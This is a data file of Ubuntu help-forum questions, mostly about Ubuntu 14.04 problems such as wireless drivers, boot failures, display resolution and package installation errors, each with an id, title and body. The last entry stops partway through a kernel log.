508320	wireless repeater causing kernel to crash	so my wireless set up is not ideal as far as my location relative to my ap goes . however i recently remembered i had/dug up an amped wireless 300n repeater ( range extender ) . i set it up in my living room , and the results have been wonderful , however , on my personal linux box , my computer will randomly just crash ! no crashes to date on any of the other machines connected to that repeater . ( they are all windows except for mine ) the output ends with : rip [ < ffffffff8131f2a9 > ] scatterwalk_start.part.5+0x9/0x10 rsp < ffff8801bed03898 > kernel panic -not syncing : fatal execption in interrupt drm_kms_helper : panic occurred , switching back to text console i am running ubuntu 14.04 heres the link to the repeater 's product page : http : //www.ampedwireless.com/support/model/sr300.html the crash usually occurs when trying to connect/disconnect ( which it sometimes does itself as it will intermittently loose signal for a moment or so ) i have pics of the entire output , as soon as i find my sd card adapter , i can upload them . i 'm really just wondering if anyone has experienced a similar problem in the past or can point me in the right direction as i have no networking knowledge whatsoever and do n't really know where to start . thanks all edit : updated my firmware and things are looking good , that might have been the trick . i suppose time will tell .
508322	how to prevent automatic hibernation while watching videos ?	i have my settings to hibernate after 20 minutes and after 5 minutes it kicks into hibernate even when i 'm watching a movie . i 'm a complete newbie with linux . i have ubuntu 14.04 and my computer is a hp 655 laptop also i have xscreensavor .
508323	ubuntu 14 and asus s551ln - wifi weak and drops off	i was running a really old hp nc6320 where ubuntu was working perfectly . so i naturally wiped windows and installed the latest ubuntu 14 on my new asus s551ln . i thought i got the wifi to work properly until 2 months in i started to notice that wifi was not connecting properly . on start up it repeatedly tries to connect and fails . eventually it does connect ( like now writing this post ) and recently occasionally after connecting it will drop off . even though the router is no more than 2 meters away , i still only have one bar on the wireless notification . i already installed drivers for the `` intel corporation wireless 7260 ( rev 6b ) '' but it is still very unpredictable . i am not sure which ones . i just found the fix on these forums and run the commands so i ca n't refer to them . i am not really sure what i should do to fix this or where i should be looking . i tried software updates to see if it would suggest and proprietary drivers but finds nothing .
508325	/etc/network/interfaces is almost empty	i 'm trying to set up a static ip address for my ltsp server as to configure one of my two nics ( internal one : server - > light client ) via the /etc/network/interfaces , but when i open the interfaces file all i can see is this : auto lo iface lo inet loopback is this normal ?
508330	i want to split sound	i would like to split sound between skype and games/music/system . i want skype to use headphones plugged in , and system to use speakers . is that possible ? microphone - mic in pink headphones - audio on green speakers - line in blue
508331	stuck booting after network adapter change	i have been switching around my virtualbox network adapters recently , and when i got to the office today my ubuntu 14.04 server vm got stuck at starting mysql [ ok ] ( or whatever the phrasing is of that bit ) . so , i try ctrl + alt + f1 and that gets stuck at intel_rapl : no valid rapl domains found in package 0 . so , i reset in ubuntu advance mode ( so i can access a shell at least ) , and comment out the mysql start on in the mysql startup config in /etc/init/ . now the vm gets stuck at either stopping send an event to indicate plymouth is up or stopping userspace bootsplash . i 'm not sure what either of those are , but i 'm using ubuntu 14.04 server so i do n't know what bootsplash has to do with anything . i did n't change anything since the vm was last working : i was at home using a bridged network adapter , came into the office , switched to a nat and host-only one , restarted the vm , and the vm got stuck on the mysql [ ok ] part . never had this problem or any other boot problem ever before . that includes me switching network adapters around occasionally . any help at all is greatly appreciated ! edit : if i wait a bit and then mash the enter key , i get to the login screen . some stuff scrolls by far too fast for me to read , but at least i can login . any explanation for this ?
508332	can not change screen refresh rate	here is my xrandr output : screen 0 : minimum 8 x 8 , current 1920 x 1080 , maximum 16384 x 16384 vga-0 disconnected ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) dp-0 connected primary 1920x1080+0+0 ( normal left inverted right x axis y axis ) 345mm x 194mm 1920x1080 59.9*+ i am trying to change refresh rate with xrandr -r 75 . but it says : rate 75.0 hz not available for this size i cant change from nvidia settings . it shows only 60 hz for refresh rate . is there any way to set it higher ? is n't 59.9*+ means `` 59.9 and higher '' ?
508333	why there is not full list of skype notifications	after i reinstalled ubuntu , i have the newest skype version installed now . and now i keep getting notifications at the right bottom corner , who came online , who went offline . i would like to get rid of these notifications , butt the problem is that problem is that at options > notifications there is no such options like to turn off or on who came and who went out . what can i do about this ? any skype parts missing or something ?
508336	can i install ubuntu 14.04 server on my android phone ?	can i install ubuntu 14.04 server on my standard , run of the mill , arm based android phone ?
508339	problems with a hfs+ hdd on ubuntu server 14.04	i have a 2tb western digital hdd with one partition formatted as hfs+ . i tried pretty much everything to make it readable ( not even writable ) from ubuntu server , but had no success . i tried : changing my linux uid to 501 installing hfsprogs and hfsplus disabling journaling from osx disk utility i 'm blocked . the root problems seems to be that linux is n't able to read a partition table on the hard drive : when i run sudo fdisk -l , it tells me that /dev/sdc does n't contain a valid partition table that said , i 'm obviously not able to mount anything since the os only knows about /dev/sdc , no partitions like /dev/sdc1 . how can i proceed ? i have access to an osx machine at all times if it 's necessary .
508340	wireless connection help for my first ever build	i just built a gaming/everyday desktop computer and this is my first time using ubuntu . i have no network connect options other than ethernet . the ubuntu help guides built in are not helping me . am i missing something ? no wireless drivers need to be installed , but three other random ones are listed . what do i need to do to get wireless network ? edit : i will be purchasing a usb wireless adaptor , as i do not own one at this time . after i get said adaptor i will edit this post/make a new one .
508342	kernel panic after wifi installation	after installing ralink wifi adapter ( digitus dn-7042-1 rev2 = 148f:7601 ) following this link : ralink 148f:7601 wifi adaptor installation the system 's ( kubuntu 14.04 ) kernel panics and switches to text console when a program accesses the internet . what to do , friends of ubuntu ?
508344	some youtube videos wo n't play in kubuntu 14.04 and chromium 36.0.1985.125	i 'm running kubuntu 14.04 and chromium 36.0.1985.125 . i 'm finding that some youtube videos give me the error : the adobe flash player is required for video playback . but most other videos work fine . i have the `` extra '' codecs installed : $ sudo apt-get remove chromium-codecs-ffmpeg reading package lists ... done building dependency tree reading state information ... done package 'chromium-codecs-ffmpeg ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ sudo apt-get install chromium-codecs-ffmpeg-extra reading package lists ... done building dependency tree reading state information ... done chromium-codecs-ffmpeg-extra is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . for comparison , i installed the latest version of firefox with flash and the same videos that wo n't play in chromium play fine in firefox . anyone know what might be wrong ?
508350	error when trying to compile mstsupportkernel	i am trying to follow the solution for the mst issue outlined here : https : //01.org/linuxgraphics/node/358 but when i try to compile the following : sudo make-kpkg -j 4 -- initrd -- append-to-version=mstsupportkernel kernel-image kernel-headers i get the following error : error : the extended version may only contain lowercase alphanumerics and the characters - + . the current value is : mstsupportkernel aborting . solved : got it . i needed to remove the uppsercase from mstsupportkernel any ideas ?
508355	ca n't upgrade from 12.10 to 14.04 / ca n't access the bios for clean install	skype stopped working for seemingly no reason ( i use 12.10 ) , it would display `` skype ca n't connect '' even though everything else was working perfectly . after checking a bunch of forums & questions on here , i uninstalled it and tried reinstalling . i get the error message '' package dependencies can not be resolved / this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time '' i tried reinstalling it using the terminal but failed there too . not too long after that i started getting system error pop ups regularly ( send report , new one pops a couple hours later ) , so i decided to upgrade , which i was putting off for a while . i 'm by no means savvy at this so after figuring out i could n't just upgrade straight to 14.04 from where i am i backed up my files and decided to do a clean install . i made a live usb using unetbootin . problem is , i ca n't seem to access the bios at all . f2 used to work when i had windows on this machine ( ubuntu is the only os i have on it at the moment ) , but it just does n't prompt anything now . neither does f12 or any of the f-s . it seems like it just speeds through the initial booting process ? any ideas what to do at this point ? i do n't care about the data remaining on the computer , i just want to install 14.04 even if that means overwriting my disk . i have a samsung notebook np300v5a if that helps .
508358	overscanning picture problem using hdmi with intel graphics	when i use my laptops hdmi on a tv the tv overscales the picture ( ~5-10 % is missing at the edges ) . there is no option on the tv ( sporting a 720p resolution btw ) . the comp is running intel hd graphics 4000 . there is no options to compensate for this in the ubuntu settings and i been playing around with xrandr ( using transform/scale ) but nothing seems to work . the plethora of guides on this subject using transform does n't work me . this is so annoying since it seems to be so easy to fix ( `` compressing '' /resizing the image to fit the screen ) but i have run out of ideas . setting custom resolutions does n't help ( still parts out of the screen ) . its basically 2 clicks away to fix in windows but in ubuntu it seems impossible ... would be really happy if someone could help me out or have any ideas what i could try ! thanks .
508359	restore default system file/folder permessions	so i accidentally typed : sudo chmod a-wrx /etc and since etc contains sudeors.d and many other critical stuff , i could n't log in/out or perform any administration tasks . i loaded grub and went root from there , i did : chmod a+wrx /etc and finally logged to the machine , but it 's now messed up ( ca n't shutdown properly , look has changed , ... etc ) . how do i restore the default permissions for etc ( or any file system ) that came shipped with the installation ( without reinstalling the system ) ?
508364	cloudera hive-metastore not installing correctly	i have the following cloudera hadoop namenode : hbase and hbaseregion are installed along the processes listed below . now when i try to install hive server or hive metastore i 'm getting the following error : ubuntu @ ip-10-191-113-109 : ~ $ sudo jps 8335 namenode 7438 quorumpeermain 8484 secondarynamenode 8650 jobtracker 9145 hmaster 11543 jps 8901 hregionserver 5592 resourcemanager ubuntu @ ip-10-191-113-109 : ~ $ sudo apt-get install hive-metastore reading package lists ... done building dependency tree reading state information ... done hive-metastore is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 68 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up hive-metastore ( 0.10.0+259-1.cdh4.7.0.p0.19~precise-cdh4.7.0 ) ... * starting hive metastore ( hive-metastore ) : invoke-rc.d : initscript hive-metastore , action `` start '' failed . dpkg : error processing hive-metastore ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up hive-server ( 0.10.0+259-1.cdh4.7.0.p0.19~precise-cdh4.7.0 ) ... * starting hive server ( hive-server ) : invoke-rc.d : initscript hive-server , action `` start '' failed . dpkg : error processing hive-server ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : hive-metastore hive-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the hive server and hive metastore installs work nicely in another machine that does n't have hbase installed . what could be the problem ? what 's wrong in the -- configure step ? how can i analise the problem deeply ?
508376	how do i fix the fstype boot issue ?	i 'm new to ubuntu ( running 14.04 ) and i need to get back to windows 8 as soon as possible so i tried using testdisk to at least access my files but when i rebooted i could n't get past the crypt page . it says : unknown fstype , bad password or options ? . i desperately need this laptop for work and i ca n't leave it like this for long .
508379	not shrink the tag of each tab , when opening more tabs in chrome browser ?	when opening more and more tabs ( 50+ ) in chrome browser , the tag of each tab becomes smaller and smaller , which makes switching between tabs difficult and the name on the tag disappear eventually . it is not the case in firefox . so i wonder how i can make chrome behaves the same as firefox ? thanks .
508380	google drive dash plugin	what is the purpose of the google drive dash plugin ? is it usable in anyway and how can it be used ? am using ubuntu 14.04 .
508383	logging in as root	newbee to ubuntu . i 've just installed ubuntu 14.04 . how do i log in as root ? alternatively , when performing su , what 's the default root password ? thanks in advance .
508387	dual monitor resolution does n't work .	so here 's the thing , you are my last resort , i have tried a lot of things before asking you for help , well not a lot , just two i think but i do n't know that much so it 's hard for me to change anything . my problem is the following , i have two monitors , i just switched from windows 7 to ubuntu , to try new things , and i love it , but there 's a problem that just buggs me . i have two monitors one is connected via hdmi and the other one is connected via a vga to dvi adapter , both are 21.5 '' and support 1920x1080 , the problem is this : the first monitor ( hdm ) works just fine , got it to full res , no problem . the second monitor says that it supports only 1600x1200 res , which my monitor only supports 1080 so it does n't run on it , but it runs just fine on 1600x900 , this is how it looks like - http : //i5.minus.com/i17vj3iqyldvz.png i have tried to manually alter the resolution in xorg.conf but it did not work , it returned back to 1600x900 . this bugs me a lot , i have got used to dual monitors from using them a long time , and i want to do it again on ubuntu but i do n't know how . so please , help me , i am really in need of help . i am using the latest drivers from the amd website ( not the beta ) for my card . i have a ati radeon hd 7950 3gb 384 bytes gddr5 . this is my current xorg.conf http : //pastebin.com/xcf7kms6 , i am using the latest version of ubuntu , all updates done . you are literally my last resort , please help me get this thing sorted . thank you .
508391	select which file to play on a vod server	okay so i setup a vod server on vlc and it 's working fine . i input more than one file into the server but on my stream only the first file is playing ( *.mp3 file ) . i was wondering if it was possible for me to select which file i want to play from my client computer .
508392	create ftp account with vsftpd limited to one folder only ?	have a fresh ubuntu install 14.04 on digital ocean . just installed vsftpd using this guide : https : //help.ubuntu.com/12.04/serverguide/ftp-server.html # vsftpd-userauth-configuration the only things i have done thus far are uncomment write_enable=yes and chroot_local_user=yes , i did nothing else . this is my first time working with this software . i need to know how to create separate ftp accounts limited to viewing/uploading/downloading to a specific folder in the public_html directory . it was easy to do this on cpanel on shared hosting , so i 'm hoping it 's possible . i am ssh'ing through terminal into the server . any help is appreciated .
508393	install ubuntu 14.04	i am using hp envy m6 with windows 8 . i would like to install ubuntu 14.04 with dual boot . can any one show me the way with images ? ?
508397	sdb appears in launcher ?	whenever i insert a usb drive into my computer the icon for usb appears , however it also adds an icon for /dev/sdb as well ; i ca n't figure out why . any thoughts on how to remove this ?
508400	i changed my apache2 directory , and now am having directory and/or permission issues	i set up apache on a ubuntu 14 machine to host my website , got it up and running . tested it out and it worked great . after that however i used the httpd.conf file to change the directory of my website from /var/www to /home/yada/yada . now whenever i search for my page in a browser , i get a 403 forbidden error . i have looked all over this site and tried a few things and nothing has fixed it so far .
508401	ubuntu 14.04 subshell and variable expansion in custom keyboard shortcuts ?	how can i enable bash expansion by custom keyboard shortcuts in 14.04 ? here 's an example that i 've been trying to get setup ; i want to execute this exact command ( which works from a terminal running bash ) : gnome-screenshot -- window -- remove-border -f ~/pictures/screenshot_ $ ( date + % x_ % h : % m : % s : % n ) .png it does n't work as is , and neither does : gnome-screenshot -- window -- remove-border -f $ home/pictures/screenshot_ $ ( date + % x_ % h : % m : % s : % n ) .png if i change it to the following : gnome-screenshot -- window -- remove-border -f `` /home/user/pictures/screenshot_ $ ( date + % x_ % h : % m : % s : % n ) .png '' i end up with a file on my desktop called `` screenshot_ $ ( date + % x_ % h : % m : % s : % n ) .png '' ( no subshell expansion ) . what am i doing wrong ? what executes these commands if not bash ? why are n't the subshells or variables/tildes expanded ?
508403	system in low graphics mode how to delete /dev/sda7 ?	so this morning i turned on my acer c710 running chrubuntu 12.04.4 lts ( i like this version better than the newer updated ones . ) and the screen says that `` the system is running in low graphics mode '' . i ran this script : df -h and got this : filesystem size used avail use % mounted on /dev/sda7 9.0g 8.6g 0 100 % / devtmpfs 936m 4.0k 936m 1 % /dev none 188m 704k 187m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 937m 0 937m 0 % /run/shm overflow 1.0m 4.0k 1020k 1 % /tmp then i tried to delete directories by running this : to free space you can : sudo apt-get autoclean look for large directories with : sudo du -sc /*/* |sort -g and delete unwanted content 3.clean your home directory using a combination of cd ~ du -sc * |sort -g rm mylargefile i keep getting an error that i can not delete my desktop , downloads , and pictures because they are directories . why ? ? ? where do i go from here ? can i salvage any documents ? thanks guys
508404	is there a way to edit a udf disk image file/iso image ?	i have an iso image with a udf filesystem and a boot sector and i need to add a file to it . when i do sudo mount -o loop , rw /tmp/file.iso /tmp/dir i get mount : block device /tmp/file.iso is write-protected , mounting read-only this happens even if i remove loop or add unhide . the file has permissions rw-rw-rw- . i have tried various udf command-line tools , but they all demand an actual cd drive , and wo n't even work with the loopback device . so is there anything i can do ? because this has a boot sector , i 'd rather edit the iso file directly than unpack/repack . using kubuntu 14.04 here . thanks .
508407	android screen display on 14.04	i know that windows allows this to be easily done with android kitkat but im wondering with the method that windows uses to mount and display your androids screen on your desktop is it able to be done on ubuntu 14.04 ive tried installing go-mtpfs to mount it doesnt exist or doesnt work when it does exist androiod sdk and adb give me too many problems to work properly if nobody is aware of what im talking about heres the video link https : //www.youtube.com/watch ? v=20h7kms57so how would that be done on ubuntu ?
508409	trouble installing windows 7 via usb	i 've spent the better part of two days trying to solve this problem , and still i 'm coming up empty . i 'm currently running ubuntu 14.04 64-bit on an asus laptop . i do n't have an optical drive , so i 'm doing this install via usb . the laptop originally came with windows 8 , but i wiped the whole thing and installed ubuntu . in my moment of genius , i did n't create a windows recovery disk , nor did i leave a windows partition . certainly not my finest hour . anyways , fast-forward to today , and i need to return to windows for work reasons . i got a windows 7 iso , a clean usb , and set to work creating a bootable usb . i first tried startup disk creator , but that crashed upon opening . next i went with unetbootin and gparted . i followed multiple instructions online on how to setup the usb . each instruction was the exact same . i had my bootable usb , so i shutdown and restarted my computer . the first time i did this , bios did n't even recognize that i had a usb plugged in . i took it out and tried a few different times . no go . i shredded the usb using sudo shred -v /dev/sdb1 , reformatted as fat32 , and then started again . same result . then i decided to skip gparted and just try unetbootin on its own . this time , bios recognized the usb , but still wo n't boot from it . even when i set it as priority and disable the other hdd , nothing happens . i have an imac , so i tried creating a bootable usb that way , but again , nothing happens in bios . the usb is recognized , but nothing happens beyond that . i 've formatted it as ntfs , fat32 , etc , but nothing happens . i got another usb and put a fresh copy of ubuntu 14.04 on it , figuring i 'd boot from the usb , select 'try ubuntu ' , use gparted to partition away a significant amount of ubuntu , shut down , and then load my windows usb . unfortunately , my computer does n't even recognize that usb . previously , i 'd had to wipe ubuntu and fresh install it ( twice , actually ) on this very laptop . i had zero problems doing that . for some reason , i ca n't fresh install ubuntu anymore . f2 , f8 , f10 , f12 , and del are the keys i know of for bootloading . f2 , f12 , and del all bring me to bios , but the others do nothing . previously , f8 worked perfectly as my `` boot from disk '' key , but it does n't work anymore . i 'm nearing my wits end . i 've done everything i can think of to get this working . i 've tried multiple windows isos , multiple ubuntu isos , etc . nothing works . i know that the iso is n't corrupted , because virtualbox loads it just fine . however , my computer is too slow for that to be a permanent solution . i 'd like to wipe the whole hdd and install windows , but i 'm afraid that if i wipe ubuntu , i may not be able to fresh install , since it does n't appear to be letting me now . any suggestions would be great . again , startup disk creator ( both versions ) do n't work . unetbootin and unetbootin 494 do n't work . gparted makes it so my computer ca n't even detect a usb . i 'd love to get this working by this weekend if possible . this is what i get when i use winusb : grub-install : error : /media/winusb_target_1407472596_7189 does n't look like an efi partition . error occurred ! syncing ... /usr/bin/winusb : line 78 : 11389 terminated while true ; do sleep 0.05 ; echo 'pulse ' ; done cleaning ... /usr/bin/winusb : line 78 : 11577 terminated while true ; do sleep 0.05 ; echo 'pulse ' ; done umounting and removing '/media/winusb_iso_1407472596_7189 ' ... umounting and removing '/media/winusb_target_1407472596_7189 ' ... edit : i tried using winusb again after formatting the usb as fat32 . here 's the second message i received : installation failed ! exit code : 512 log : formating device ... mounting ... mount : block device /home/zachary/windows7ultimate/windows7ultimate.iso is write- protected , mounting read-only copying ... installing grub ... installing for x86_64-efi platform . grub-install : error : /media/winusb_target_1407516090_3201 does n't look like an efi partition . error occurred ! syncing ... /usr/bin/winusb : line 78 : 11389 terminated while true ; do sleep 0.05 ; echo 'pulse ' ; done cleaning ... /usr/bin/winusb : line 78 : 11577 terminated while true ; do sleep 0.05 ; echo 'pulse ' ; done umounting and removing '/media/winusb_iso_1407472596_7189 ' ... umounting and removing '/media/winusb_target_1407472596_7189 ' ...
508410	after install google chrome in ec2 wo n't open from ubuntu server 14.04 lts ( hvm ) command line	i have installed google chrome with following command line : $ wget -q -o - https : //dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add - $ sudo sh -c 'echo `` deb http : //dl.google.com/linux/chrome/deb/ stable main '' > > /etc/apt/sources.list.d/google.list' $ sudo apt-get update $ sudo apt-get install google-chrome-stable when try to open google chrome from command line ( $ google-chrome ) , i am getting following error : [ 5426:5426:0808/041800 : error : browser_main_loop.cc ( 209 ) ] gtk : can not open display : how can i fix this issue to open the google browser ?
508416	ext4 data recovery from gparted error	there is a number of other questions on this topic , however majority concerns formatted partitions or drive failure . in my case : during resizing and moving 2.7tb partition in gparted , i encountered an error that froze the whole program . ( i dont have a screenshot or output from it , as fas as i remember , it was something about error when reading partition ) . i ran mkfs.ext4 -s and fsck.ext4 -y . it took it couple of days , then the system was crashing because it ran out of ram and swap ( 8+8gb ) . after adding 200gb of swap , fsck ran for about two weeks but suddenly stopped with an error , unfortunately i didnt screenshot . i tried running the same combination of mkfs and fsck again , but this time every time fsck ran , it made two cores of my cpu to go 100 % and utterly froze the entire system . not even alt+sysrq reisub worked . this happened 2-3 times . the current output from fsck is : ext2fs_open2 : bad magic number in super-block fsck.ext4 : superblock invalid , trying backup blocks ... fsck.ext4 : bad magic number in super-block while trying to open /dev/sdd1 the superblock could not be read or does not describe a valid ext2/ext3/ext4 filesystem . if the device is valid and it really contains an ext2/ext3/ext4 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device > or e2fsck -b 32768 < device > when running sudo e2fsck -b 8193 or 32768 , the output is : e2fsck : attempt to read block from filesystem resulted in short read while > trying to open /dev/sdd1 could this be a zero-length partition ? i tried running testdisk but it stops at 2026 cylinder and does not go any further no matter how long i wait . i do have a backup made by ddrescue , but because of that i completely ran out of free space on any of my drives . i fear , that error during moving/resizing partitions has made all the data on the partition chopped up and unintelligible to data recovery software . i will appreciate any kind of suggestion as to what my next step should be . should i give up and dd the image back to the partition and try again with fsck ? thank you
508420	brief tty screen before boot login screen shows up	after i installed an nvidia graphics driver , a tty login screen appears about halt a second just before the lightdm shows up . when the system used nouveau open source driver , the computer did n't show anything like this . is there something wrong with my installation ? so far , nothing strange came out except for this tty login screen ... . if this is ok , is there any way to get rid of that brief tty screen during boot ? thank you and i use ubuntu 14.04.1 and nvidia-331 from the standard ubuntu source .
508422	boot repair : error occurred	we were trying to install ubuntu 14.04 in dual boot mode with windows 8.1 uefi in my new hp laptop . the installation of ubuntu was finished successfully . but when i rebooted ( with secure boot disabled ) it is not showing any grub menu and directly going to windows . so i tried boot-repair . for this i plugged our usb drive back in and reboot so that the live version of ubuntu runs again . then i used following command for boot repair . sudo add-apt-repository ppa : yannubuntu/boot-repair sudo sed 's/trusty/saucy/g ' -i /etc/apt/sources.list.d/yannubuntu-boot-repair-trusty.list sudo apt-get update sudo apt-get install -y boot-repair & & ( boot-repair & ) then i repaired the boot with the launched boot-repair window . but it end with the following error message . `` an error occurred during the repair . please write on a paper the following url : http : //paste.ubuntu.com/7982274/ in case you still experience boot problem , indicate this url to : boot.repair @ gmail.com you can now reboot your computer . please do not forget to make your bios boot on sda ( 1000gb ) disk ! '' i also send a mail to the given mail id . please suggest a method to solve my problem . thanks .
508423	how to successfully install itunes on ubuntu 12.04 ?	i have been attempting to install itunes via playon linux . it installed ... sort of ... i can open and view itunes , but do get the message itunes was not properly installed and on package manager it says the following : e : type â < ! doctypeâ is not known on line 1 in source list /etc/apt/sources.list.d/playonlinux.list e : the list of sources could not be read . go to the repository dialogue to correct the problem . e : _cache- > open ( ) failed , please report . it also does not see my iphone when connecting it to the pc . can anybody help ?
508428	trackpad mouse click not responsive	after trying for a while finally managed to run ubuntu on my acer d255 e , using seagate external hdd . all is working fine apart from mouse . although trackpad allow me to select program and open application . i can not click select within application , the only way i can click select is using a combination of tab/arrow keys/enter when within an application . in universal access under the pointer and clicking : mouse key is off simulated secondary click on hover click off in mouse and touchpad under all setting general : primary button left/ double click half way touch pad : on slow 1/3 of the way only tap to click is selected my system . running ubuntu 14.04 lts memory 2gb intel atom cpu n555 @ 1,50ghz x 4 32-bit any pointers on how to fully enable trackpad and mouse click ? so that i can fully enjoy the wonder of using ubuntu beautiful features . thanks
508429	percona xtradb server cluster 5.6 setup	thanks for any help you can provide i seem to be stuck on this error for hours . i am trying to setup a percona 5.6 cluster . i have installed on 14.04 these packages and removed any trace of mysql . percona-xtradb-cluster-server-5.6 percona-xtradb-cluster-client-5.6 i have then tried to bootstrap a cluster . this works correctly on 192.168.1.2 wsrep_provider=/usr/lib/libgalera_smm.so # wsrep_cluster_address=gcomm : //192.168.1.2,192.168.1.3 wsrep_cluster_address=gcomm : // wsrep_node_address=192.168.1.2 default_storage_engine=innodb wsrep_cluster_name=sociabledata wsrep_sst_auth= '' sstuser : < password > '' binlog_format=row innodb_locks_unsafe_for_binlog=1 innodb_autoinc_lock_mode=2 wsrep_sst_method=xtrabackup i then setup .3 wsrep_provider=/usr/lib/libgalera_smm.so wsrep_cluster_address=gcomm : //192.168.1.2,192.168.1.3 wsrep_node_address=192.168.1.3 default_storage_engine=innodb wsrep_cluster_name=sociabledata wsrep_sst_auth=sstuser : < some pass > binlog_format=row innodb_locks_unsafe_for_binlog=1 innodb_autoinc_lock_mode=2 wsrep_sst_method=xtrabackup watching error log for .2 does not show anything for serious errors other then .3 trying to connect , and disconnecting.. essentially is what i am understanding of it . .3 shows me this error 2014-08-07 23:57:56 19987 [ note ] wsrep : running : 'wsrep_sst_xtrabackup -- role 'joiner ' -- address '192.168.1.3 ' -- auth 'sstuser : s3cretpass ' -- datadir '/var/lib/mysql/ ' -- defaults-file '/etc/mysql/my.cnf ' -- parent '19987 ' '' ' 2014-08-07 23:57:56 19987 [ error ] wsrep : failed to read 'ready < addr > ' from : wsrep_sst_xtrabackup -- role 'joiner ' -- address '192.168.1.3 ' -- auth 'sstuser : < password > ' -- datadir '/var/lib/mysql/ ' -- defaults-file '/etc/mysql/my.cnf ' -- parent '19987 ' '' read : ' ( null ) ' 2014-08-07 23:57:56 19987 [ error ] wsrep : process completed with error : wsrep_sst_xtrabackup -- role 'joiner ' -- address '192.168.1.3 ' -- auth 'sstuser : < password > ' -- datadir '/var/lib/mysql/ ' -- defaults-file '/etc/mysql/my.cnf ' -- parent '19987 ' '' : 2 ( no such file or directory ) 2014-08-07 23:57:56 19987 [ error ] wsrep : failed to prepare for 'xtrabackup ' sst . unrecoverable . 2014-08-07 23:57:56 19987 [ error ] aborting yes i have confirmed i can mysql -u sstuser -p and works from .2 i am using service mysql start in all cases . i would tag this percona but i do not have the reputation : ( should also note on .3 if i run the command wsrep_sst_xtrabackup -- role 'joiner ' -- address '192.168.1.3 ' -- auth 'sstuser : ' -- datadir '/var/lib/mysql/ ' -- defaults-file '/etc/mysql/my.cnf ' -- parent '19987 ' '' it gives no error , and seems to be waiting for something . i am running ubuntu 14.04 server .
508430	i ca n't find the ubuntu installer for windows so that i can dual boot	this question may be very naive and silly , but i was reading up on downloading ubuntu on my windows 7 device so that i could dual boot , and use programs on windows 7 , as well as use ubuntu . this seemed like the best option for me . the article i was reading stated that for this option , the easiest thing to do was download a windows installer for ubuntu . they provided a link , so clicked it , and it took me to the desktop download page , which i thought was the installer . i downloaded the .iso file , but realized that that was n't what i was supposed to have downloaded . i tried to look for the windows installer so that i can install is almost as a program , but i ca n't find anything . am i looking for the right thing ? if so , where is the windows installer . if not , what do i download for the dual boot system , and what do i do , since everything i 've read says not to download the .iso file . thanks !
508431	how to restore battery status indicator in landscape mode ?	on an ubuntu 12.04 system , i rotated my beagle board screen display to landscape mode and now the battery status indicator applet is disappeared . is there any simple applet program to display the battery status in ubuntu or any possible way to show the battery status indicator applet ?
508435	error message display during the boot `` allhwsupport ''	after the grub interface a message always appears in the screen before the login screen `` support for core revisions 0*17 & 0*18 is disabled by module param allhwsupport =0 '' what is its meaning and how am i supposed to deal with it ?
508438	system hangs on boot after burg install	i installed burg using these instructions . burg-emu worked fine , the burg interface worked great , and i can still boot windows correctly . when i boot linux ( recovery or normal ) , i get the linux splash , but after the last lines of my boot log my machine is just frozen . i tried reverting the bootloader to grub from the live usb . despite an error ( about 'the canonical path for /cow ' ) , i now get the old grub interface , but same broken boot . maybe i missed the burg-install step ? hopefully the issue is more obvious to someone else , please pull me out of this rabbit hole ! ( ubuntu 14.04 )
508445	no sound through headphones	i 'm using elementary os luna , which is based on ubuntu 12.04 . the sound was working fine , but after a restart , i could hear only through the speakers on my laptop and there is no audio when i plug-in my headphones . i tried a lot of solution on the internet , nothing seems to work . so i am posting it here . if you guys need any further information i will be happy provide . $ sudo aplay -l [ sudo ] password for gowtham : ** list of playback hardware devices ** card 0 : intel [ hda intel ] , device 0 : alc271x analog [ alc271x analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0
508447	how to delete all the files/folders from the folder except few folders ?	assume that i have a directory structure as follows : /application -- -- application/config -- -- -- -- application/config/c1.conf -- -- -- -- application/config/c2.conf -- -- application/logs -- -- -- -- application/logs/l1.txt -- -- -- -- application/logs/l2.txt -- -- application/src -- -- -- -- application/src/static -- -- -- -- application/src/s1.py -- -- -- -- application/src/s2.py now i want to delete all the folders except config and logs ( in this case , only src ) . my pwd is currently a parent of appliaction/ dir ( i.e . i can see application in my pwd ) . what command should i use ? ( i tried with rm -rf with some options but mistakenly deleted other files , so i would like to know the correct answer before trying anything else ! )
508448	unable to boot ubuntu after windows 8.1 installation .	i first installed ubuntu 14.04 from live usb and after confirming that it s working properly i installed windows 8.1 from cd . now i am unable to boot ubuntu . although windows is working fine .
508449	installing broadcom b43 wireless firmware	i 've been at this for 3 hours and i ca n't figure out why it 's not working ! i successfully got the installer installed , but when i check for the firmware it says it 's not there . my wireless device 's pci.id is 14e4:4318 rev 02 and i can not connect via ethernet cable . so i have to transfer the files to install . there 's conflicting instructions and i ca n't wrap my head around what 's what now . i am a newbie and this is my first time with ubuntu as well so that 's likely what 's wrong here ! but anyway i 'm going to reinstall ubuntu fresh and try again . is there any good newibie instructions i can follow to get my wireless card working ? edit ran the command to check the drivers and it came back with this : [ 20.894855 ] b43-phy0 : broadcom 4318 wlan found ( core revision 9 ) [ 20.957474 ] b43-phy0 : found phy : analog 3 , type 2 ( g ) , revision 7 [ 21.034511 ] b43 ssb0:0 : direct firmware load failed with error -2 [ 21.034518 ] b43 ssb0:0 : falling back to user helper [ 22.271586 ] b43 ssb0:0 : direct firmware load failed with error -2 [ 22.271592 ] b43 ssb0:0 : falling back to user helper [ 22.477077 ] b43 ssb0:0 : direct firmware load failed with error -2 [ 22.477084 ] b43 ssb0:0 : falling back to user helper [ 22.481364 ] b43 ssb0:0 : direct firmware load failed with error -2 [ 22.481370 ] b43 